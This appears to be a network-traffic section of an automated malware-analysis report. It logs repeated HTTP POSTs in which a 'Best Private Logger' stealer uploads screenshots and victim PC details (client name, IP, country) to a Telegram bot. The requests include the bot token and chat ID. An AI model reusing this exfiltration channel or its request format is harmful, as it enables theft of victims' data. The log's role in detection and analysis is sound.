                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31fcb1fbe305Host: api.telegram.orgContent-Length: 698579Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3218644a77aaHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3237e999b955Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32589c75e68aHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd327a79df105cHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32a01899557cHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32cab7b3ac2fHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32fcdc51679aHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332c38e45a80Host: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336822cbc6adHost: api.telegram.orgContent-Length: 695477Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D%0A*%20%20%20%20%20%20Private%20%20-%20-%20-%20-%3E%20%20%7C____%5C___/%20%5C___%7C%5C___%7C___%7C_%7C_%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A***********************************************************%20%0D%0A%0D%0A%0D%0A==========PC%20INFO==========%0D%0AClient%20Name:724536%0D%0AFullDate:%2009/01/2025%20-%2005:37:53%0D%0AIP:%208.46.123.189%0D%0ACountry:%20United%20States%0D%0A==========PC%20INFO========== HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a50f73e733Host: api.telegram.orgContent-Length: 695916Connection: Keep-Alive
